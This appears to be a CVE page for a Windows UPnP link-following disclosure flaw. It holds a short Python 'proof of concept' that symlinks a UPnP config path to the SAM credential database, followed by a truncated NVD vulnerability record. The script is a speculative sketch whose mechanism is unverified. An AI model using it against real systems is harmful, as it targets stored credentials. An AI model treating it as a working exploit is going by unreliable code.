CVE-2026-32212

import os # PoC Concept for CVE-2026-32212 # This demonstrates creating a symlink to exploit improper link resolution. def create_malicious_link(target, link_name): try: # Create a symbolic link pointing to a sensitive file os.symlink(target, link_name) print(f"[+] Created symlink: {link_name} -> {target}") except Exception as e: print(f"[-] Error creating link: {e}") def trigger_exploit(): # Target a sensitive system file (e.g., SAM database) sensitive_file = r"C:\Windows\System32\config\SAM" # The path that upnp.dll is expected to access vulnerable_path = r"C:\ProgramData\Microsoft\UPnP\Config.xml" print(f"[*] Attempting to exploit CVE-2026-32212...") create_malicious_link(sensitive_file, vulnerable_path) # In a real scenario, trigger the UPnP service to read the file print(f"[*] Waiting for UPNP service to access {vulnerable_path}...") print(f"[*] If successful, the service will read {sensitive_file} via the link.") if __name__ == "__main__": trigger_exploit()

{"cve": {"id": "CVE-2026-32212", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:27.900", "lastModified": "2026-04-20T14:55:12.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper link resolution before file access ('link following') in Universal Plug and Play (upnp.dll) allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "158C16A3-547E-4130-8428-8E429C37E573"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.14393.9060", "matchCriteriaId": "58E1A340-D49A-4EBB-A750-876922ACD5CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "64248504-2307-45FC-8FF3-7A227CFD8675"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8644", "matchCriteriaId": "9B1465B1-BDE6-4634-8F12-43F71D68A4D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "88A175C4-E033-4FE7-B2BF-8BAE14321BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "86DBF14A-F486-4FE7-9126-D1D54952FC6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "C375372B-D3D4-4B11-AAD8-69AC344C24BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "8CE2E268-E776-4697-9E43-33ABA4CDBE05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "269B8E88-6473-41DD-BA33-D9184B82CA58"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "FCBB431B-EF21-4454-BDA3-D8F276BE7A64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "B33CE091-B873-4C30-BA05-54A8C1839212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "E3AF28F3-D486-4B88-9E0E-371241024174"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "94EB36C7-1FF2-4B44-AD91-F3540F09393E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "14B23C3F-C8AC-491A-BCA5-EB6982C8F9E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "361B5DAB-8D1F-45D7-A33C-F49EBA56B5F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "ADC6CE99-AB5D-4DD5-82A9-892366C4B2FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7DF96F8-BA6A-4780-9CA3-F719B3F81074"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "matchCriteriaId": "DB18C4CE-5917-401E-ACF7-2747084FD36E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:* ... (truncated)